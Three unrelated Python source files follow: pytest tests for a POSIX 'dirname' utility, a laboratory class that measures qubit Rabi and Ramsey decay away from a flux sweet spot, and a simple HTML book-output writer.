""" Tests for POSIX-compatible `dirname`. https://pubs.opengroup.org/onlinepubs/9699919799/utilities/dirname.html """ from helpers import check, check_version, run def test_version(): """Check that we're using Boreutil's implementation.""" assert check_version("dirname") def test_missing_args(): """No args => error of the form `dirname: ...`""" assert run(["dirname"]).stderr.startswith("dirname:") assert run(["dirname"]).returncode > 0 def test_extra_args(): """Too many args => error of the form `dirname: ...`""" assert run(["dirname", "a", "b", "c"]).stderr.startswith("dirname:") assert run(["dirname", "a", "b", "c"]).returncode > 0 def test_help(): """Passing -h or --help => print help text.""" assert run(["dirname", "-h"]).stdout.split(' ')[0] == 'Usage:' assert run(["dirname", "--help"]).stdout.split(' ')[0] == 'Usage:' assert run(["dirname", "-h"]).returncode > 0 assert run(["dirname", "--help"]).returncode > 0 def test_main(): """This was split into the test_step[1-8] functions below.""" pass # Test the various steps: def test_step1(): """1. If string is "//", return a slash.""" assert check(["dirname", "//"]).stdout == "/\n" def test_step2(): """2. If string consists entirely of slashes, return a single slash.""" assert check(["dirname", "////////////////////////////"]).stdout == "/\n" def test_step3(): """3. Remove trailing slashes.""" assert check(["dirname", "/foo//////"]).stdout == "/\n" assert check(["dirname", "/foo/bar//////"]).stdout == "/foo\n" def test_step4(): """4. If there are no slashes, return a dot.""" assert check(["dirname", "owo"]).stdout == ".\n" assert check(["dirname", "."]).stdout == ".\n" def test_step5(): """5. If there are any trailing non-<slash> characters, remove them.""" assert check(["dirname", "/owo/uwu"]).stdout == "/owo\n" def test_step6(): """6. If the remaining string is "//", it is implementation defined whether to skip the remaining steps. We chose _not_ to skip them.""" assert check(["dirname", "//fuck"]).stdout == "/\n" def test_step7(): """7. Remove trailing slashes again.""" assert check(["dirname", "/foo////////bar"]).stdout == "/foo\n" def test_step8(): """8. If the remaining string is empty, return a slash.""" assert check(["dirname", "///"]).stdout == "/\n"
from lib2.Measurement import Measurement from lib2.MeasurementResult import MeasurementResult from lib2.DispersiveRabiOscillations import DispersiveRabiOscillations from lib2.DispersiveRamsey import DispersiveRamsey from copy import deepcopy import csv import numpy as np from scipy.optimize import minimize from scipy.interpolate import interp1d from datetime import datetime as dt from importlib import reload from . import structures reload(structures) from .structures import Snapshot class DispersiveRabiFromFrequency(Measurement): ''' @brief: class is used to measure qubit lifetimes from the flux/qubit if_freq displacement from the sweet-spot. Measurement setup is the same as for the any other dispersive measurements. ''' def __init__(self, name, sample_name, ss_current_or_voltage, ss_freq, tts_result, lowest_ss=True, current_source=[None], q_z_awg=[None], plot_update_interval=5, **devs_aliases_map): ''' @params: name: string. sample_name: string. ss_current_or_voltage: float sweet spot DC bias or voltage depending on wether bias source or AWG is used to bias qubit flux ss_freq: float if_freq of the qubit in the sweet-spot of interest lowest_ss: bool sign of the second derivative of if_freq on flux shift variable if sign is positive, then this is a lower sweet-spot and lower_ss=True if sign is negative -> lower_ss = False dev_aliases_map: dict that contains following key:val pairs vna: alias address string or driver class vector network analyzer. q_lo: alias address string or driver class qubit if_freq generator for lo input of the mixer. ro_iqawg: IQAWG class instance AWG used to control readout pulse generation mixer q_iqawg: IQAWG class instance AWG used to control qubit excitation pulse generation mixer One of the following DC sources must be provided: current_source: alias address string or driver class bias source used to tune qubit if_freq q_z_awg: alias address string or driver class AWG generator that used to tune qubit if_freq plot_update_interval: float sleep milliseconds between plot updates ''' ## Equipment variables declaration section START ## self._current_source = None self._q_z_awg = None self._vna = None self._q_lo = None self._ro_awg = None self._q_awg = None ## Equipment variables declaration section END ## ## DEBUG self._fluxPts_iter_ctr = 0 # constructor initializes devices from kwargs.keys() with '_' appended # keys must coincide with the attributes introduced in # "equipment variables declaration section" # TODO: set_fixed_parmaeters in DRO class uses q_awg and ro_awg names instead of # more proper ro_iqawg and q_iqawg devs_aliases_map.update(current_source=current_source, q_z_awg=q_z_awg) super().__init__(name, sample_name, devs_aliases_map, plot_update_interval) ## initializing base class elements with child specific values ## self._measurement_result = RabiFromFrequencyResult(name, sample_name) # last successful two tone spectroscopy result # that contains sweet-spot in its area # as well as all the qubit frequencies that # are going to be measured in this class self._tts_result = tts_result self._snap = Snapshot(self._tts_result._data) # can be used to exctract curves in the future self._tts_curves = {} # list of functions that results from scipy.interp1d self._current_curve = None # bias tts curve that is chosen by self.set_tts_curve(curve_key) method ## Initial and bias freq(bias or voltage) point control START ## self._ss_freq = ss_freq self._ss_flux_var_value = ss_current_or_voltage self._lowest_ss = lowest_ss # True if bias is used, False if voltage source is used self._current_flag = None self._flux_var_setter = None self._flux_var = None # flux variable value now self._last_flux_var = None # last flux variable value # constructor arguments consistency test if( current_source is not None ): self._current_flag = True self._flux_var_setter = self._current_source[0].set_current elif( q_z_awg is not None ): self._current_flag = False self._flux_var_setter = self._q_z_awg[0].set_voltage else: print("RabiFromFreq: You must provide one and only one of the following \ constructor parameters:\n \ current_source or q_z_awg.") raise TypeError ## Initial and bias freq(bias or voltage) point control END ## # set_fixed_params args are stored here self._fixed_devices_params = {} # set_swept_params excitation_durations argument is stored here self._basic_excitation_durations = None # class that is responsible for rabi measurements self._DRO = DispersiveRabiOscillations(name, sample_name, **devs_aliases_map) # Rabi measurement class # class that is responsible for Ramsey measurements self._DR = DispersiveRamsey(name, sample_name, **devs_aliases_map) # Ramsey measurement class def load_curve_from_csv(self, filepath): """ TODO: add description """ with open(filepath, "r") as csv_file: rows = list(csv.reader(csv_file)) header = rows[0] curves_N = int(len(header) / 2) for curve_idx in range(curves_N): curve_name = header[2 * curve_idx] x = [] y = [] for i in range(0, len(rows) - 2): if (rows[i + 2][2 * curve_idx] != ""): x.append(rows[i + 2][2 * curve_idx]) y.append(rows[i + 2][2 * curve_idx + 1]) else: break # make sure there is no identical 'x' values x = np.array(x, dtype=np.float64) y = np.array(y, dtype=np.float64) unique_idcs = np.unique(x, return_index=True)[1] x = x[unique_idcs] y = y[unique_idcs] y_from_x_fit = interp1d(x, y, kind="cubic", copy=False, assume_sorted=False, fill_value="extrapolate") self._tts_curves[curve_name] = y_from_x_fit print("loaded tts_curves from file: " + filepath) print("curve labels: ", self._tts_curves.keys()) def select_tts_curve(self, curve_key): self._current_curve = self._tts_curves[curve_key] def set_fixed_parameters(self, rabi_sequence_parameters, detect_resonator=False, plot_resonator_fit=False, **devs_params): self._fixed_devices_params = devs_params self._DRO.set_fixed_parameters(rabi_sequence_parameters, detect_resonator=detect_resonator, plot_resonator_fit=plot_resonator_fit, **devs_params) def set_swept_parameters(self, rabi_excitation_durations, ss_shifts): ''' @params: excitation_durations - list of the rabi excitation pulse durations ss_shifts - list of absolute values of the qubit if_freq shift from sweet-spot ''' self._basic_excitation_durations = rabi_excitation_durations self._DRO.set_swept_parameters(rabi_excitation_durations) ramsey_delays = rabi_excitation_durations self._DR.set_swept_parameters(ramsey_delays) super().set_swept_parameters(ss_shifts=(self._ss_shift_setter, ss_shifts)) def set_ult_calib(self, ult_calib): # TODO: docstring self._DRO.set_ult_calib(ult_calib) self._DR.set_ult_calib(ult_calib) def _ss_shift_setter(self, ss_freq_shift): self._fluxPts_iter_ctr += 1 ''' @brief: sets new flux bias for a qubit to achieve qubit if_freq = ss_freq +- ss_freq_shift '+' or '-' is depending on the qubit freq(flux_bias) function behaviour around sweet_spot value ''' if( self._lowest_ss is True ): init_qubit_frequency = self._ss_freq + ss_freq_shift else: init_qubit_frequency = self._ss_freq - ss_freq_shift qubit_frequency = init_qubit_frequency # finding value of the new flux variable f = self._current_curve def f2min(x): return (f(x) - qubit_frequency)**2 # f(x) is returning if_freq value in Hz ig_x = None if( self._last_flux_var is None ): ig_x = self._ss_flux_var_value else: ig_x = self._last_flux_var res = minimize(f2min, ig_x, method="L-BFGS-B", bounds=((f.x[0], f.x[-1]),)) # setting new flux bias self._flux_var = res.x[0] self._flux_var_setter(self._flux_var) print("new flux variable: {}".format(self._flux_var), " mA") ## Adjusting if_freq to the present spot START ## ramsey_freq = 0 ramsey_shift = 5e6 ramsey_shift_error = 0.5e6 iteration_ctr = 0 # if there is no winner during the choice of the ramsey if_freq side, # than we change qubit if_freq by shift in this list n_trials = 5 fail_shift_list = [] for i in range(n_trials+1): m = i % 2 fail_shift_list.append((2*m-1) * ramsey_shift * (i / (n_trials - 1))) trial_ctr = 0 while( abs(ramsey_freq - ramsey_shift) > ramsey_shift_error ): # waiting for Ramsey to converge iteration_ctr += 1 print( "\npoint number {} iteration number {} trial number {}".format(self._fluxPts_iter_ctr, iteration_ctr, trial_ctr+1)) # gathering last successful device parameters dro_fixed_pars = self._DRO._fixed_pars pulse_seq_params = self._DRO._measurement_result.get_context().get_pulse_sequence_parameters() m = None if dro_fixed_pars["q_awg"][0]["calibration"]._sideband_to_maintain == "left": m = 1 elif dro_fixed_pars["q_awg"][0]["calibration"]._sideband_to_maintain == "right": m = -1 dro_fixed_pars["q_lo"][0]["if_freq"] = qubit_frequency + m * dro_fixed_pars["q_awg"][0]["calibration"]._if_frequency # finding Rabi pi/2 pulse self._DRO.set_fixed_parameters(pulse_seq_params, detect_resonator=True, plot_resonator_fit=False, **dro_fixed_pars) self._DRO.set_swept_parameters(self._basic_excitation_durations) self._rabi_oscillations_record() # updating Ramsey pulse sequence pi_pulse_duration = self._DRO._measurement_result.get_pi_pulse_duration()*1e3 basis = self._DRO._measurement_result.get_basis() ramsey_pulse_seq_params = deepcopy(pulse_seq_params) ramsey_pulse_seq_params.update(half_pi_pulse_duration=pi_pulse_duration / 2) # measuring Ramsey if_freq number 1 | (q_freq - ramsey_shift) apr_ramsey_freq1 = qubit_frequency - ramsey_shift dro_fixed_pars["q_lo"][0]["if_freq"] = apr_ramsey_freq1 + m * dro_fixed_pars["q_awg"][0]["calibration"]._if_frequency self._DR.set_fixed_parameters(ramsey_pulse_seq_params, detect_resonator=True, plot_resonator_fit=False, **dro_fixed_pars) self._DR.set_swept_parameters(self._basic_excitation_durations) # ramsey delays self._DR.set_basis(basis) self._ramsey_oscillations_record() ramsey_freq1 = self._DR._measurement_result.get_ramsey_frequency() fit_params1 = self._DR._measurement_result._fit_params data1 = self._DR._measurement_result._prepare_data_for_plot(self._DR._measurement_result.get_data()) # maybe I should calculate fit success index based on the relative residual per point residuals1 = self._DR._measurement_result._cost_function(fit_params1, *data1) print(ramsey_freq1) # measuring Ramsey if_freq number 2 | (q_freq + ramsey_shift) apr_ramsey_freq2 = qubit_frequency + ramsey_shift dro_fixed_pars["q_lo"][0]["if_freq"] = apr_ramsey_freq2 + m * dro_fixed_pars["q_awg"][0]["calibration"]._if_frequency self._DR.set_fixed_parameters(ramsey_pulse_seq_params, detect_resonator=True, plot_resonator_fit=False, **dro_fixed_pars) self._DR.set_swept_parameters(self._basic_excitation_durations) # ramsey delays self._DR.set_basis(basis) self._ramsey_oscillations_record() ramsey_freq2 = self._DR._measurement_result.get_ramsey_frequency() fit_params2 = self._DR._measurement_result._fit_params data2 = self._DR._measurement_result._prepare_data_for_plot(self._DR._measurement_result.get_data()) residuals2 = self._DR._measurement_result._cost_function(fit_params2, *data2) print(ramsey_freq2) if( (ramsey_freq2 + ramsey_freq1) > (2*ramsey_shift - ramsey_shift_error) and (ramsey_freq1 + ramsey_freq2) < (2*ramsey_shift + ramsey_shift_error) ): # if two frequencies are fitted normally and their sum is close # to the apriory computed value 2*ramsey_shift qubit_frequency = qubit_frequency + ramsey_shift - ramsey_freq2 ramsey_freq = ramsey_freq2 else: # one of the fit failed qubit_frequency = init_qubit_frequency + fail_shift_list[trial_ctr-1] trial_ctr += 1 print("New qubit if_freq: {}", qubit_frequency, flush=True) self._last_flux_var = self._flux_var print("new ss shift is setted") print("flux var value: {}\nqubit_frequency: {}".format(self._flux_var, qubit_frequency)) def _adjust_freq_with_TTS(self, flux_var, ro_power=None): """ @brief: Function measures single line of TTS in the 'flux_val' point around the bias chosen curve y(flux_var) point. The scan is performed with very weak readout freq to neglect ACSTark effect. Measured curve is then fitted and maximum corresponding to the qubit is exctracted. @params: flux_var : float Flux DC source output value ro_power : float (dBm) If provided, the readout is set to this value. If None -> using readout power settings that corresponds to ro_cal value for pulsed measurements. @return: new_qubit_frequency : float (Hz) number that represents the local maximum on the local TTS """ # TODO: consider implementing this function raise NotImplementedError def _recording_iteration(self): # _DRO will detect resonator and new qubit if_freq bias # during the call of the setters print("starting rabi\n") T_R, T_R_error = self._rabi_oscillations_record() print("starting ramsey\n") T_Ramsey, T_Ramsey_error = self._ramsey_oscillations_record() result = [T_R, T_R_error, T_Ramsey, T_Ramsey_error] return result # Pulse measurement decays is stored in self._raw_data def _rabi_oscillations_record(self): self._measurement_result._now_meas_type = "Rabi" # clearing previous fit results due to the fact, that VNATimeResolvedDispersiveMeasurement1D._fit_complex_curve(..) # when this fit_params are not None # almost every time tries to use this parameters as the new best initial guess # and due to the fact, that the next measurements is performed in entirely different flux point # this initial guess vector does not fit the parameter's fit bounds that are generated from # the data of the bias measurement self._DRO._measurement_result._fit_params = None self._DRO._measurement_result._fit_errors = None # this is due to the fact that first fit of the data # in DispersiveRabiOscillations is generating stupid bounds # for optimization methods, based on previous measurement data # so, this data has to be erased self._DRO._measurement_result.set_data({}) self._measurement_result._DRO_result = self._DRO._measurement_result self._DRO._measurement_result.set_start_datetime(dt.now()) if self._DRO._measurement_result.is_finished(): print("Starting with a result from a previous launch") self._DRO._measurement_result.set_is_finished(False) print("Started at: ", self._DRO._measurement_result.get_start_datetime()) self._DRO._record_data() self._DRO._measurement_result.fit(verbose=False) print("DRO._record_data finished") T_R = self._DRO._measurement_result._fit_params[2] # see DispersiveRabiOscillationsResult._model T_R_error = self._DRO._measurement_result._fit_errors[2] self._measurement_result._DRO_results.append(deepcopy(self._DRO._measurement_result)) return T_R, T_R_error def _ramsey_oscillations_record(self): self._measurement_result._now_meas_type = "Rabi" # clearing previous fit results due to the fact, that VNATimeResolvedDispersiveMeasurement1D._fit_complex_curve(..) # when this fit_params are not None # almost every time tries to use this parameters as the new best initial guess # and due to the fact, that the next measurements is performed in entirely different flux point # this initial guess vector does not fit the parameter's fit bounds that are generated from # the data of the bias measurement self._measurement_result._now_meas_type = "Ramsey" self._DR._measurement_result._fit_params = None self._DR._measurement_result._fit_errors = None # this is due to the fact that first fit of the data # in DispersiveRabiOscillations is generating stupid bounds # for optimization methods, based on previous measurement data # so, this data has to be erased # Ramsey oscillations data is erased just for sake of symmetry. # Actually there is no need to do this for DispersiveRamsey self._DR._measurement_result.set_data({}) self._measurement_result._DR_result = self._DR._measurement_result self._DR._measurement_result.set_start_datetime(dt.now()) if self._DR._measurement_result.is_finished(): print("Starting with a result from a previous launch") self._DR._measurement_result.set_is_finished(False) print("Started at: ", self._DR._measurement_result.get_start_datetime()) self._DR._record_data() self._DR._measurement_result.fit(verbose=False) print("DR._record_data finished") T_Ramsey, T_Ramsey_error = self._DR._measurement_result.get_ramsey_decay() self._measurement_result._DR_results.append(deepcopy(self._DR._measurement_result)) return T_Ramsey, T_Ramsey_error # TODO: NOT WORKING YET. Consider to implement working version or delete the following code ''' self._snap oonnected routines. def plot_tts_connectivity_map(self, rel_threshold=0.5, kernel_x=0.1, kernel_y=0.1, connectivity=8): """ @brief: This function is ought to be called before the self.launch() in order to perform visual control of the spectrum fitting """ self._snap._connected_components() self._snap.visualize_connectivity_map() def set_connectivity_component_index(self, cc_index): """ @brief: This function is ought to be called before the self.launch() in order to perform visual control of the spectrum fitting. Function is called right after the call to the self.plot_fft_connectivity_map(...) :param cc_index: integer index that were chosen manually by operator after examining self.plot_fft_connectivity_map(...) output :return: interpolation function y(x) that is returned by scipy.interp1d(...) """ self._snap._make_target_component_mask(label_i=cc_index) self._snap._interpolate_yx_curve() return self._snap._target_y_func def detect_tts_lines(self, kernel_x=0.1, kernel_y=0.1, rel_threshold=0.5, connectivity=8): # TODO: docstring self._snap.make_and_visualize_connectivity_map(rel_threshold=rel_threshold, kernel_x=kernel_x, kernel_y=kernel_y, connectivity=connectivity) def select_tts_line(self, label_i): # TODO: docstring mask = self._snap.select_connectivity_component(label_i) self._snap.interpolate_yx_curve() return self._snap._target_y_func ''' class RabiFromFrequencyResult(MeasurementResult): def __init__(self, name, sample_name): super().__init__(name, sample_name) self._line_scatter = None self.ss_shifts = None # results of last oscillation measurement is stored here self._DRO_result = None self._DR_result = None # parameter that shows what is measured at this particular moment self._now_meas_type = None # "Rabi", "Ramsey" # self._DRO.launch().data will be stored in the following list self._DRO_results = [] # self._DR.launch().data will be stored in the following list self._DR_results = [] def _prepare_figure(self): import matplotlib.pyplot as plt fig, axes = plt.subplots(3,1) axes = np.ravel(axes) return fig, axes, None def _prepare_data_for_plot(self,data): return data[self._parameter_names[0]], data["data"][:, 0] def _plot(self, data): ''' caxes is None ''' import time if( "data" in data.keys()): # print(data) # time.sleep(2) x,y_data = self._prepare_data_for_plot(data) xlim = np.array([x[0], x[-1]])/1e6 # convert to MHz # crop data that is still to be measured y_data = y_data[y_data != 0] x = x[:len(y_data)] # redrawing axes data ax = self._axes[0] ax.reset() ax.set_xlabel(r"$\delta \nu$, MHz") ax.set_ylabel(r"$T_R, \; \mu s$") ax.grid() self._line_scatter, = ax.plot(x/1e6, y_data, 'r', marker="o", markerfacecolor='none') # setting x limit for graph ax.set_xlim(xlim[0], xlim[1]) ## plot rabi result if( (self._DRO_result is not None) and (self._now_meas_type == "Rabi") ): # there is no function on the plotting Thread that is called when we are moving from one point to another self._DRO_result._axes = self._axes[1:3] self._DRO_result._figure = self._figure DRO_data = self._DRO_result.get_data() # prepeare bias DRO_data # TODO: hotfix by Shamil # 'DispersiveRabiOscillationsResult' object has no attribute '_dynamic' # when dynamic==True the code in VNATRDM1D skips replotting the data # this conflict whith a previously drawn picture e.g. from "Ramsey" # when False it replots the whole curve setattr(self._DRO_result, "_dynamic", False) self._DRO_result._plot(DRO_data) elif( (self._DR_result is not None) and (self._now_meas_type == "Ramsey") ): # there is no function on the plotting Thread that is called when we are moving from one point to another self._DR_result._axes = self._axes[1:3] self._DR_result._figure = self._figure DR_data = self._DR_result.get_data() # prepeare bias DRO_data # TODO: hotfix by Shamil # 'DispersiveRabiOscillationsResult' object has no attribute '_dynamic' # when dynamic==True the code in VNATRDM1D skips replotting the data # this conflict whith a previously drawn picture e.g. from "Rabi" # when False it replots the whole curve setattr(self._DR_result, "_dynamic", False) self._DR_result._plot(DR_data)
""" Simple HTML output. Useful for checking the conversion. """ from .output import OutputFile from .. import text import os class HtmlOutput(OutputFile): def __init__(self, outfile, outdir=None): OutputFile.__init__(self) self.__metadata = None self.__outfile = outfile self.__outdir = outdir self.__chapter_titles = [] self.__title_stuff = [] self.__chapters = [] def add_section(self, section): if isinstance(section, text.Chapter): self.__chapter_titles.append(section.name) self.__chapters.append(section) elif len(self.__chapters) <= 0: self.__title_stuff.append(section) else: raise Exception("Only top-level chapters are allowed") def set_metadata(self, metadata): assert isinstance(metadata, text.MetaData) self.__metadata = metadata def write(self): with open(self.__outfile, "w") as out: if self.__metadata is not None: write_metadata(self.__metadata, out) else: write_generic_header(out) for sec in self.__title_stuff: write_part(sec, out) write_toc(self.__chapter_titles, out) for sec in self.__chapters: write_chapter(sec, out, self.__outdir) write_footer(out) def preview(self): pass def add_toc(self, toc): pass def write_metadata(metadata, out): assert isinstance(metadata, text.MetaData) # Ignore cover image out.writelines("""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>{title}</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> </head> <body> <h1>{title}</h1> <h2>By {author_first} {author_last}</h2> <h2>{description}</h2> <h3>&copy; {year} {isbn_10} / {isbn_13}</h3> """.format(**metadata.as_dict())) def write_generic_header(out): out.writelines("""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>A Book</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> </head> <body> <h1>A Book</h1> """) def write_toc(titles, out): out.write(" <h4>Table of Contents</h4>\n <ol>\n") for name in titles: out.write(" <li><a href='#{0}'>{0}</a></li>\n".format(name)) out.write(" </ol>\n") def write_chapter(sec, out, outdir): assert isinstance(sec, text.Chapter) out.write(" <h4><a name='{0}'>{0}</a></h4>\n".format(sec.name)) for part in sec.get_children(): write_part(part, out, outdir) def write_part(sec, out, outdir, pref=">"): if isinstance(sec, text.Image): print(pref+" image") if outdir is not None: fname = os.path.join(outdir, sec.filename) dirname = os.path.split(fname)[0] if not os.path.isdir(dirname): os.makedirs(dirname) with open(fname, "wb") as f: sec.save_as(f) out.write(" <img src='{0}'>\n".format(sec.filename)) elif isinstance(sec, text.Para): print(pref+" para") out.write(" <p>") for span in sec.get_children(): write_part(span, out, outdir, pref+">") out.write("</p>\n") elif isinstance(sec, text.Text): # italics and so on x = sec.text if isinstance(sec, text.SpecialCharacter): x = sec.html else: x = x.replace("<","&lt;").replace(">","&gt;").replace("&","&amp;") print(pref+" text[{0}]".format(x)) out.write("<span>{0}</span>".format(x)) elif isinstance(sec, text.SeparatorLine): out.write(" <center>* * *</center>\n") elif isinstance(sec, text.Correction): # ignore print("Correction: was originally [{0}]".format(sec.original)) pass else: raise Exception("unknown part {0}".format(sec)) def write_footer(out): out.writelines(""" </body> </html> """)